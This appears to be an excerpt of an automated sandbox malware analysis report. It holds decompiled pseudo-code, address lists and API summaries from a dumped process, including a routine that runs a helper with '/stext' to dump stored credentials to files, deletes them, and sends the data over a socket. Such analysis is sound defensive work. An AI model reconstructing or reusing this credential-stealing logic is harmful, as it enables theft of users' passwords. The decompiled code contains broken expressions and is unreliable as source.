								_t245 = _t244 | E004516F4(_t210, _t224, _t233, _t244,  &_v28, 0, _t233, 0x19, _v8 + 0x29);
								_t246 = _t245 | E004516F4(_t210, _t224, _t233, _t245,  &_v28, 0, _t233, 0x54, _v8 + 0x2a);
								_t247 = _t246 | E004516F4(_t210, _t224, _t233, _t246,  &_v28, 0, _t233, 0x55, _v8 + 0x2b);
								_t248 = _t247 | E004516F4(_t210, _t224, _t233, _t247,  &_v28, 0, _t233, 0x56, _v8 + 0x2c);
								_t249 = _t248 | E004516F4(_t210, _t224, _t233, _t248,  &_v28, 0, _t233, 0x57, _v8 + 0x2d);
								_t250 = _t249 | E004516F4(_t210, _t224, _t233, _t249,  &_v28, 0, _t233, 0x52, _v8 + 0x2e);
								_t251 = _t250 | E004516F4(_t210, _t224, _t233, _t250,  &_v28, 0, _t233, 0x53, _v8 + 0x2f);
								_t252 = _t251 | E004516F4(_t210, _t224, _t233, _t251,  &_v28, 2, _t233, 0x15, _v8 + 0x38);
								_t253 = _t252 | E004516F4(_t210, _t224, _t233, _t252,  &_v28, 2, _t233, 0x14, _v8 + 0x3c);
								_t254 = _t253 | E004516F4(_t210, _t224, _t233, _t253,  &_v28, 2, _t233, 0x16, _v8 + 0x40);
								_t255 = _t254 | E004516F4(_t210, _t224, _t233, _t254,  &_v28, 2, _t233, 0x17, _v8 + 0x44);
								_t256 = _t255 | E004516F4(_t210, _t224, _t233, _t255,  &_v28, 2, _t233, 0x50, _v8 + 0x48);
								if((E004516F4(_t210, _t224, _t233, _t256,  &_v28, 2, _t233, 0x51, _v8 + 0x4c) | _t256) == 0) {
									_t226 =  *_v20;
									while( *_t226 != 0) {
										_t195 =  *_t226;
										if(_t195 < 0x30 || _t195 > 0x39) {
											if(_t195 != 0x3b) {
												goto L17;
											}
											_t257 = _t226;
											do {
												 *_t257 =  *((intOrPtr*)(_t257 + 1));
												_t257 = _t257 + 1;
											} while ( *_t257 != 0);
										} else {
											 *_t226 = _t195 - 0x30;
											L17:
											_t226 = _t226 + 1;
										}
									}
									goto L25;
								}
								E0044ED82(_v8);
								E00445002(_v8);
								E00445002(_v12);
								E00445002(_v16);
								goto L4;
							}
							E00445002(_t234);
							E00445002(_v12);
							L7:
							goto L4;
						}
						E00445002(_t234);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t231 = 0;
					_v12 = 0;
					_t236 = 0x46f188;
					L27:
					_t105 =  *(_t210 + 0x84);
					if(_t105 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t210 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t105 | 0xffffffff) == 0) {
							E00445002( *(_t210 + 0x88));
							E00445002( *((intOrPtr*)(_t210 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t210 + 0x7c)) = _v12;
					 *(_t210 + 0x84) = _t231;
					 *(_t210 + 0x88) = _t236;
					return 0;
				}
			}












































                0x0044ee80
                0x0044ee89
                0x0044ee90
                0x0044ee93
                0x0044ee96
                0x0044ee9f
                0x0044eec1
                0x0044eec5
                0x0044eec8
                0x0044eed2
                0x0044eee5
                0x0044eee9
                0x0044eeec
                0x0044eef6
                0x0044ef08
                0x0044f19e
                0x0044f19f
                0x0044f1a1
                0x0044f1a9
                0x0044f1ad
                0x0044f1b2
                0x0044f1bd
                0x0044f1c9
                0x0044f1d5
                0x0044f1e1
                0x0044f1e7
                0x0044f1eb
                0x0044f1ed
                0x0044f1ed
                0x00000000
                0x0044f1eb
                0x0044ef17
                0x0044ef1b
                0x0044ef1e
                0x0044ef28
                0x0044ef3c
                0x0044ef42
                0x0044ef57
                0x0044ef6b
                0x0044ef82
                0x0044ef9c
                0x0044efa4
                0x0044efb6
                0x0044efcd
                0x0044efe4
                0x0044effe
                0x0044f015
                0x0044f02c
                0x0044f043
                0x0044f05d
                0x0044f074
                0x0044f08b
                0x0044f0a2
                0x0044f0bc
                0x0044f0d3
                0x0044f0ea
                0x0044f101
                0x0044f11b
                0x0044f137
                0x0044f165
                0x0044f178
                0x0044f169
                0x0044f16d
                0x0044f181
                0x00000000
                0x00000000
                0x0044f183
                0x0044f185
                0x0044f188
                0x0044f18a
                0x0044f18d
                0x0044f173
                0x0044f175
                0x0044f177
                0x0044f177
                0x0044f177
                0x0044f16d
                0x00000000
                0x0044f17d
                0x0044f13d
                0x0044f143
                0x0044f14c
                0x0044f155
                0x00000000
                0x0044f15a
                0x0044ef2b
                0x0044ef34
                0x0044eefe
                0x00000000
                0x0044eefe
                0x0044eef9
                0x00000000
                0x0044eef9
                0x0044eed4
                0x00000000
                0x0044eea9
                0x0044eea9
                0x0044eeab
                0x0044eeae
                0x0044f1ef
                0x0044f1ef
                0x0044f1f7
                0x0044f1f9
                0x0044f1f9
                0x0044f201
                0x0044f206
                0x0044f20a
                0x0044f212
                0x0044f21a
                0x0044f220
                0x0044f20a
                0x0044f224
                0x0044f229
                0x0044f22f
                0x00000000
                0x0044f22f

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                • Opcode ID: 81053f9c94f3d198c50d80b60ac2f365dac252c2faa5b35674da0a71a95d3b8d
                • Instruction ID: f43520f85eab2823aefddca190de3c75bdb19f5807818d4f337798dcfd7c07fb
                • Opcode Fuzzy Hash: 81053f9c94f3d198c50d80b60ac2f365dac252c2faa5b35674da0a71a95d3b8d
                • Instruction Fuzzy Hash: 18C14476E40205AFEB20DBA9CC42FEF77F8AB18704F14416AFA04FB286D6749D458764
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00411FF7 Relevance: 18.0, APIs: 9, Strings: 1, Instructions: 482sleepfileCOMMON
                Download Yara Rule
                C-Code - Quality: 95%
                			E00411FF7() {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t165;
				void* _t168;
				void* _t174;
				void* _t180;
				void* _t186;
				void* _t192;
				void* _t198;
				void* _t212;
				void* _t217;
				void* _t222;
				void* _t223;
				void* _t254;
				void* _t255;
				void* _t291;
				void* _t292;
				void* _t293;
				void* _t294;
				char _t298;
				intOrPtr _t300;
				void* _t474;
				void* _t494;
				void* _t500;
				void* _t504;
				void* _t505;
				void* _t506;
				void* _t507;
				intOrPtr _t519;

				GetModuleFileNameW(0, _t505 + 0x178, 0x104);
				E004020BF(_t291, _t505 + 0xf8);
				E004020BF(_t291, _t505 + 0xe0);
				E004020BF(_t291, _t505 + 0xc8);
				_t494 = Sleep;
				_t504 = 0;
				do {
					 *((char*)(_t505 + 0x1b)) = 0;
					 *((char*)(_t505 + 0x19)) = 0;
					 *((char*)(_t505 + 0x1a)) = 0;
					E0040CEEC(_t505 + 0xb4, 0x30, E00401F8B(E0041A4D3(_t505 + 0x1c)));
					E00401FB8();
					E0040CEEC(_t505 + 0x9c, 0x30, E00401F8B(E0041A4D3(_t505 + 0x1c)));
					E00401FB8();
					_t165 = E00401F8B(E0041A4D3(_t505 + 0x1c));
					_t459 = 0x30;
					E0040CEEC(_t505 + 0x84, 0x30, _t165);
					E00401FB8();
					_t292 = 0;
					while(1) {
						_t168 = E00401F8B(_t505 + 0x3c8);
						_t174 = E00401EE4(E00402FF4(_t292, _t505 + 0x20, E004042FD(_t292, _t505 + 0x58, E004042DC(_t292, _t505 + 0x74, _t505 + 0x194, _t504, 0, E0040415E(_t292, _t505 + 0x38, _t459, _t504, L" /stext \"")), _t504, 0, _t505 + 0xb4), _t494, _t504, 0, "\""));
						_t459 = _t168;
						 *((char*)(_t505 + 0x16)) = E00417456(_t174);
						E00401EE9();
						E00401EE9();
						E00401EE9();
						E00401EE9();
						if( *((char*)(_t505 + 0x16)) != 0) {
							break;
						}
						Sleep(0xa);
						_t292 = _t292 + 1;
						if(_t292 < 0xa) {
							continue;
						}
						break;
					}
					_t293 = 0;
					while(1) {
						_t180 = E00401F8B(_t505 + 0x3f8);
						_t186 = E00401EE4(E00402FF4(_t293, _t505 + 0x3c, E004042FD(_t293, _t505 + 0x70, E004042DC(_t293, _t505 + 0x5c, _t505 + 0x194, _t504, 0, E0040415E(_t293, _t505 + 0x1c, _t459, _t504, L" /stext \"")), _t504, 0, _t505 + 0x9c), _t494, _t504, 0, "\""));
						_t459 = _t180;
						 *((char*)(_t505 + 0x18)) = E00417456(_t186);
						E00401EE9();
						E00401EE9();
						E00401EE9();
						E00401EE9();
						if( *((char*)(_t505 + 0x18)) != 0) {
							break;
						}
						Sleep(0xa);
						_t293 = _t293 + 1;
						if(_t293 < 0xa) {
							continue;
						}
						break;
					}
					_t294 = 0;
					while(1) {
						_t192 = E00401F8B(_t505 + 0x3e0);
						_t198 = E00401EE4(E00402FF4(_t294, _t505 + 0x3c, E004042FD(_t294, _t505 + 0x70, E004042DC(_t294, _t505 + 0x5c, _t505 + 0x194, _t504, 0, E0040415E(_t294, _t505 + 0x1c, _t459, _t504, L" /stext \"")), _t504, 0, _t505 + 0x84), _t494, _t504, 0, "\""));
						_t459 = _t192;
						 *((char*)(_t505 + 0x17)) = E00417456(_t198);
						E00401EE9();
						E00401EE9();
						E00401EE9();
						E00401EE9();
						if( *((char*)(_t505 + 0x17)) != 0) {
							break;
						}
						Sleep(0xa);
						_t294 = _t294 + 1;
						if(_t294 < 0xa) {
							continue;
						}
						break;
					}
					_t519 =  *((intOrPtr*)(_t505 + 0x16));
					_t60 = (0 | _t519 == 0x00000000) + 1; // 0x1
					_t62 = ( !=  ? _t519 == 0 : _t60) + 1; // 0x2
					_t296 =  !=  ?  !=  ? _t519 == 0 : _t60 : _t62;
					_t500 = 0;
					 *((intOrPtr*)(_t505 + 0x34)) =  !=  ?  !=  ? _t519 == 0 : _t60 : _t62;
					while(1) {
						E00401EE4(_t505 + 0xb0);
						if(E0041ADFE(_t505 + 0xf8) != 0) {
							DeleteFileW(E00401EE4(_t505 + 0xb0));
						}
						E00401EE4(_t505 + 0x80);
						if(E0041ADFE(_t505 + 0xe0) == 0) {
							_t298 =  *((intOrPtr*)(_t505 + 0x19));
						} else {
							_t298 = 1;
							 *((char*)(_t505 + 0x19)) = 1;
							DeleteFileW(E00401EE4(_t505 + 0x80));
						}
						E00401EE4(_t505 + 0x98);
						_t471 = _t505 + 0xc8;
						if(E0041ADFE(_t505 + 0xc8) != 0) {
							 *((char*)(_t505 + 0x1a)) = 1;
							DeleteFileW(E00401EE4(_t505 + 0x98));
						}
						if(_t298 != 0 && _t298 != 0 &&  *((char*)(_t505 + 0x1a)) != 0) {
							break;
						}
						Sleep(0x1f4);
						_t500 = _t500 + 1;
						if(_t500 < 0xa) {
							continue;
						}
						break;
					}
					_t212 = E0040619C();
					_t300 =  *((intOrPtr*)(_t505 + 0x34));
					if(_t212 == 0 || E0040619C() == 0 || E0040619C() == 0) {
						E00401EE9();
						E00401EE9();
						E00401EE9();
					} else {
						goto L25;
					}
					L28:
					E0040AE7E(_t300, _t505 + 0x118, _t471, _t494, _t504, 0x2710, 0);
					_t217 = E00401EE4(_t505 + 0x110);
					_t506 = _t505 - 0x18;
					E004020D6(_t300, _t506, _t471, _t533, _t506 + 0x428);
					E00412770(_t506 + 0x50, _t217, _t217, _t504);
					_t507 = _t506 + 0x18;
					E00401EE9();
					_t222 = E00405AE5("0");
					_t474 = _t507 + 0x110;
					_t534 = _t222;
					if(_t222 == 0) {
						_t223 = E0041A879(_t300, _t507 + 0x1c, _t474);
						E00402E81(_t508, E00402EF0(_t300, _t508 + 0x190, E00402EF0(_t300, _t508 + 0x17c, E00402EF0(_t300, _t508 + 0x168, E00402EF0(_t300, _t508 + 0x154, E00402EF0(_t300, _t508 + 0x68, E00402EF0(_t300, _t508 + 0x9c, E00402F11(_t507 - 0x18 + 0x68, _t507 - 0x18 + 0x3c8, _t504, 0x472ec8), _t504, __eflags, _t508 + 0x128), _t504, __eflags, 0x472ec8), _t504, __eflags, _t508 + 0x108), _t504, __eflags, 0x472ec8), _t504, __eflags, _t508 + 0xe8), _t504, __eflags, 0x472ec8), _t223);
						_push(0x6a);
						E00404A81(0x473388, _t233, __eflags);
						E00401FB8();
						E00401FB8();
						E00401FB8();
						E00401FB8();
						E00401FB8();
						E00401FB8();
						E00401FB8();
					} else {
						_t254 = E0041A879(_t300, _t507 + 0x170, _t474);
						_t508 = _t507 - 0x18;
						_t255 = E0041A6E9(_t300, _t507 - 0x18 + 0x170, _t300);
						E00402E81(_t508, E00402EF0(_t300, _t508 + 0x58, E00402E81(_t508 + 0x8c, E00402EF0(_t300, _t508 + 0x78, E00402EF0(_t300, _t508 + 0x48, E00402EF0(_t300, _t508 + 0xe0, E00402EF0(_t300, _t508 + 0xcc, E00402EF0(_t300, _t508 + 0xb8, E00402EF0(_t300, _t508 + 0x164, E00402F11(_t508 + 0x180, _t508 + 0x3f0, _t504, 0x472ec8), _t504, _t534, _t508 + 0x130), _t504, _t534, 0x472ec8), _t504, _t534, _t508 + 0x110), _t504, _t534, 0x472ec8), _t504, _t534, _t508 + 0xf0), _t504, _t534, 0x472ec8), _t255), _t504, _t534, 0x472ec8), _t254);
						_push(0x69);
						E00404A81(0x473388, _t267, _t534);
						E00401FB8();
						E00401FB8();
						E00401FB8();
						E00401FB8();
						E00401FB8();
						E00401FB8();
						E00401FB8();
						E00401FB8();
						E00401FB8();
						E00401FB8();
					}
					E00401FB8();
					E00401EE9();
					E00401FB8();
					E00401FB8();
					E00401FB8();
					E00401FB8();
					E00401FB8();
					E00401FB8();
					E00401FB8();
					E00401FB8();
					return E00401FB8();
					L25:
					Sleep(0x64);
					E00401EE9();
					E00401EE9();
					E00401EE9();
					_t504 = _t504 + 1;
					_t533 = _t504 - 0xa;
				} while (_t504 < 0xa);
				goto L28;
			}


































                0x00412010
                0x0041201d
                0x00412029
                0x00412035
                0x0041203a
                0x00412040
                0x00412042
                0x00412046
                0x0041204b
                0x00412050
                0x0041206b
                0x00412075
                0x00412094
                0x0041209e
                0x004120ae
                0x004120b4
                0x004120bd
                0x004120c7
                0x004120cc
                0x004120ce
                0x004120d5
                0x00412123
                0x00412128
                0x00412135
                0x00412139
                0x00412142
                0x0041214b
                0x00412154
                0x0041215e
                0x00000000
                0x00000000
                0x00412162
                0x00412164
                0x00412168
                0x00000000
                0x00000000
                0x00000000
                0x00412168
                0x0041216e
                0x00412170
                0x00412177
                0x004121c5
                0x004121ca
                0x004121d7
                0x004121db
                0x004121e4
                0x004121ed
                0x004121f6
                0x00412200
                0x00000000
                0x00000000
                0x00412204
                0x00412206
                0x0041220a
                0x00000000
                0x00000000
                0x00000000
                0x0041220a
                0x00412210
                0x00412212
                0x00412219
                0x00412267
                0x0041226c
                0x00412279
                0x0041227d
                0x00412286
                0x0041228f
                0x00412298
                0x004122a2
                0x00000000
                0x00000000
                0x004122a6
                0x004122a8
                0x004122ac
                0x00000000
                0x00000000
                0x00000000
                0x004122ac
                0x004122b4
                0x004122c0
                0x004122cb
                0x004122ce
                0x004122d1
                0x004122d3
                0x004122db
                0x004122e2
                0x004122f7
                0x00412308
                0x00412308
                0x00412315
                0x0041232a
                0x00412347
                0x0041232c
                0x0041232c
                0x00412335
                0x0041233f
                0x0041233f
                0x00412352
                0x00412357
                0x00412367
                0x00412370
                0x0041237b
                0x0041237b
                0x00412383
                0x00000000
                0x00000000
                0x00412395
                0x00412397
                0x0041239b
                0x00000000
                0x00000000
                0x00000000
                0x0041239b
                0x004123a8
                0x004123ad
                0x004123b3
                0x00412410
                0x0041241c
                0x00412428
                0x00000000
                0x00000000
                0x00000000
                0x0041242d
                0x0041243b
                0x00412447
                0x0041244c
                0x0041245b
                0x00412466
                0x0041246b
                0x00412472
                0x00412483
                0x00412488
                0x0041248f
                0x00412491
                0x004125ef
                0x00412687
                0x0041268d
                0x00412694
                0x004126a0
                0x004126ac
                0x004126b8
                0x004126c4
                0x004126cd
                0x004126d6
                0x004126df
                0x00412497
                0x0041249e
                0x004124a3
                0x004124b8
                0x00412561
                0x00412567
                0x0041256e
                0x00412577
                0x00412580
                0x00412589
                0x00412592
                0x0041259e
                0x004125aa
                0x004125b6
                0x004125c2
                0x004125ce
                0x004125da
                0x004125df
                0x004126e8
                0x004126f4
                0x00412700
                0x0041270c
                0x00412718
                0x00412724
                0x00412730
                0x0041273c
                0x00412748
                0x00412754
                0x0041276f
                0x004123d5
                0x004123d7
                0x004123e0
                0x004123ec
                0x004123f8
                0x004123fd
                0x004123fe
                0x004123fe
                0x00000000

                APIs
                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412010
                  • Part of subcall function 0041A4D3: GetCurrentProcessId.KERNEL32(00000000,7476FBB0,00000000,?,?,?,?,0046A8F0,0040C716,.vbs,?,?,?,?,?,00473238), ref: 0041A4FA
                  • Part of subcall function 00417456: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00463E44), ref: 0041746C
                  • Part of subcall function 00417456: CloseHandle.KERNEL32(D>F,?,?,004040D5,00463E44), ref: 00417475
                • Sleep.KERNEL32(0000000A,00463E44), ref: 00412162
                • Sleep.KERNEL32(0000000A,00463E44,00463E44), ref: 00412204
                • Sleep.KERNEL32(0000000A,00463E44,00463E44,00463E44), ref: 004122A6
                • DeleteFileW.KERNEL32(00000000,00463E44,00463E44,00463E44), ref: 00412308
                • DeleteFileW.KERNEL32(00000000,00463E44,00463E44,00463E44), ref: 0041233F
                • DeleteFileW.KERNEL32(00000000,00463E44,00463E44,00463E44), ref: 0041237B
                • Sleep.KERNEL32(000001F4,00463E44,00463E44,00463E44), ref: 00412395
                • Sleep.KERNEL32(00000064), ref: 004123D7
                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                • String ID: /stext "
                • API String ID: 1223786279-3856184850
                • Opcode ID: 62e8ad8a7ebeb560cf04e09332c1e85e5a03159076cac99f94857d822d4bee3e
                • Instruction ID: fc4ad0b7eed9c60d5fc35351bb25392cbbf70f9ec0b82e477513c0ff0abfdd60
                • Opcode Fuzzy Hash: 62e8ad8a7ebeb560cf04e09332c1e85e5a03159076cac99f94857d822d4bee3e
                • Instruction Fuzzy Hash: A70246315083414AC328FB61D891AEFB3D5AFD4348F50493FF48A931E2EF789A49C65A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004544DC Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 41%
                			E004544DC(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t164;
				intOrPtr _t180;
				signed int* _t190;
				signed int _t192;
				char _t197;
				signed int _t203;
				signed int _t206;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t227;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed char _t242;
				intOrPtr _t245;
				void* _t248;
				void* _t252;
				void* _t262;
				signed int _t263;
				signed int _t266;
				signed int _t269;
				signed int _t270;
				void* _t272;
				void* _t274;
				void* _t275;
				void* _t277;
				void* _t278;
				void* _t280;
				void* _t284;

				_t262 = E0045423F(__ecx,  &_v72, _a16, _a20, _a24);
				_t192 = 6;
				memcpy( &_v48, _t262, _t192 << 2);
				_t274 = _t272 + 0x1c;
				_t248 = _t262 + _t192 + _t192;
				_t263 = _t262 | 0xffffffff;
				if(_v36 != _t263) {
					_t114 = E0044EB75(_t248, _t263, __eflags);
					_t190 = _a8;
					 *_t190 = _t114;
					__eflags = _t114 - _t263;
					if(_t114 != _t263) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t275 = _t274 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t275,  &_v48, 1 << 2);
						_t197 = 0;
						_t252 = E004541AA();
						_t277 = _t275 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t252);
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E0044EABE(_t197,  *_t190, _t252);
								_t242 = _v5 | 0x00000001;
								_v5 = _t242;
								_v48 = _t242;
								 *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
								_t203 =  *_t190;
								_t205 = (_t203 & 0x0000003f) * 0x30;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x470810 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L20:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t278 = _t277 - 0x18;
									_t206 = 6;
									_push( *_t190);
									memcpy(_t278,  &_v48, _t206 << 2);
									_t134 = E00453F5D(_t190,  &_v48 + _t206 + _t206,  &_v48);
									_t280 = _t278 + 0x30;
									__eflags = _t134;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
										 *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t225 =  *_t190;
												_t227 = (_t225 & 0x0000003f) * 0x30;
												_t164 =  *((intOrPtr*)(0x470810 + (_t225 >> 6) * 4));
												_t87 = _t164 + _t227 + 0x28;
												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t266 = _v44;
										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
										if((_t266 & 0xc0000000) != 0xc0000000) {
											L31:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L31;
											}
											CloseHandle(_v12);
											_v44 = _t266 & 0x7fffffff;
											_t215 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
											_t245 = E004541AA();
											__eflags = _t245 - 0xffffffff;
											if(_t245 != 0xffffffff) {
												_t217 =  *_t190;
												_t219 = (_t217 & 0x0000003f) * 0x30;
												__eflags = _t219;
												 *((intOrPtr*)( *((intOrPtr*)(0x470810 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
												goto L31;
											}
											E0043EE77(GetLastError());
											 *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
											E0044EC87( *_t190);
											L10:
											goto L2;
										}
									}
									_t269 = _t134;
									goto L22;
								} else {
									_t269 = E004543BB(_t205,  *_t190);
									__eflags = _t269;
									if(__eflags != 0) {
										L22:
										E0044A5EC(__eflags,  *_t190);
										return _t269;
									}
									goto L20;
								}
							}
							_t270 = GetLastError();
							E0043EE77(_t270);
							 *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
							CloseHandle(_t252);
							__eflags = _t270;
							if(_t270 == 0) {
								 *((intOrPtr*)(E0043EEAD())) = 0xd;
							}
							goto L2;
						}
						_t234 = _v44;
						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
						if((_t234 & 0xc0000000) != 0xc0000000) {
							L9:
							_t235 =  *_t190;
							_t237 = (_t235 & 0x0000003f) * 0x30;
							_t180 =  *((intOrPtr*)(0x470810 + (_t235 >> 6) * 4));
							_t33 = _t180 + _t237 + 0x28;
							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E0043EE77(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t284 = _t277 - 0x18;
						_v44 = _t234 & 0x7fffffff;
						_t239 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t284,  &_v48, _t239 << 2);
						_t197 = 0;
						_t252 = E004541AA();
						_t277 = _t284 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E0043EE9A()) =  *_t186 & 0x00000000;
						 *_t190 = _t263;
						 *((intOrPtr*)(E0043EEAD())) = 0x18;
						goto L2;
					}
				} else {
					 *(E0043EE9A()) =  *_t188 & 0x00000000;
					 *_a8 = _t263;
					L2:
					return  *((intOrPtr*)(E0043EEAD()));
				}
			}





















































                0x004544ff
                0x00454503
                0x00454504
                0x00454504
                0x00454504
                0x00454506
                0x0045450c
                0x00454527
                0x0045452c
                0x0045452f
                0x00454531
                0x00454533
                0x00454552
                0x00454559
                0x00454560
                0x00454563
                0x0045456f
                0x00454572
                0x0045457a
                0x0045457b
                0x0045457e
                0x0045457e
                0x00454585
                0x00454587
                0x0045458a
                0x00454592
                0x00454595
                0x00454602
                0x00454603
                0x00454609
                0x0045460b
                0x00454654
                0x00454657
                0x00454660
                0x00454663
                0x00454666
                0x00454668
                0x00454668
                0x00454668
                0x00454659
                0x0045465c
                0x0045465c
                0x0045466d
                0x00454670
                0x0045467c
                0x00454681
                0x0045468d
                0x00454697
                0x0045469b
                0x004546a5
                0x004546a8
                0x004546b3
                0x004546b8
                0x004546c8
                0x004546cb
                0x004546cf
                0x004546d0
                0x004546d6
                0x004546db
                0x004546de
                0x004546e0
                0x004546e2
                0x004546e7
                0x004546ea
                0x004546ec
                0x00454716
                0x0045473a
                0x0045473e
                0x00454742
                0x00454744
                0x00454748
                0x0045474a
                0x00454754
                0x00454757
                0x0045475e
                0x0045475e
                0x0045475e
                0x0045475e
                0x00454748
                0x00454763
                0x0045476f
                0x00454771
                0x004547fc
                0x004547fc
                0x00000000
                0x00454777
                0x00454777
                0x0045477b
                0x00000000
                0x00000000
                0x00454780
                0x00454792
                0x0045479a
                0x0045479d
                0x0045479e
                0x004547a1
                0x004547a8
                0x004547ad
                0x004547b0
                0x004547e4
                0x004547ee
                0x004547ee
                0x004547f8
                0x00000000
                0x004547f8
                0x004547b9
                0x004547d2
                0x004547d9
                0x004545fc
                0x00000000
                0x004545fc
                0x00454771
                0x004546ee
                0x00000000
                0x004546ba
                0x004546c1
                0x004546c4
                0x004546c6
                0x004546f0
                0x004546f2
                0x00000000
                0x004546f8
                0x00000000
                0x004546c6
                0x004546b8
                0x00454613
                0x00454616
                0x00454631
                0x00454636
                0x0045463c
                0x0045463e
                0x00454649
                0x00454649
                0x00000000
                0x0045463e
                0x00454597
                0x0045459e
                0x004545a0
                0x004545d7
                0x004545d7
                0x004545e1
                0x004545e4
                0x004545eb
                0x004545eb
                0x004545eb
                0x004545f7
                0x00000000
                0x004545f7
                0x004545a2
                0x004545a6
                0x00000000
                0x00000000
                0x004545a8
                0x004545b7
                0x004545bc
                0x004545bf
                0x004545c0
                0x004545c3
                0x004545c3
                0x004545ca
                0x004545cc
                0x004545cf
                0x004545d2
                0x004545d5
                0x00000000
                0x00000000
                0x00000000
                0x00454535
                0x0045453a
                0x0045453d
                0x00454544
                0x00000000
                0x00454544
                0x0045450e
                0x00454513
                0x00454519
                0x0045451b
                0x00000000
                0x00454520

                APIs
                  • Part of subcall function 004541AA: CreateFileW.KERNEL32(00000000,00000000,?,00454585,?,?,00000000,?,00454585,00000000,0000000C), ref: 004541C7
                • GetLastError.KERNEL32 ref: 004545F0
                • __dosmaperr.LIBCMT ref: 004545F7
                • GetFileType.KERNEL32(00000000), ref: 00454603
                • GetLastError.KERNEL32 ref: 0045460D
                • __dosmaperr.LIBCMT ref: 00454616
                • CloseHandle.KERNEL32(00000000), ref: 00454636
                • CloseHandle.KERNEL32(?), ref: 00454780
                • GetLastError.KERNEL32 ref: 004547B2
                • __dosmaperr.LIBCMT ref: 004547B9
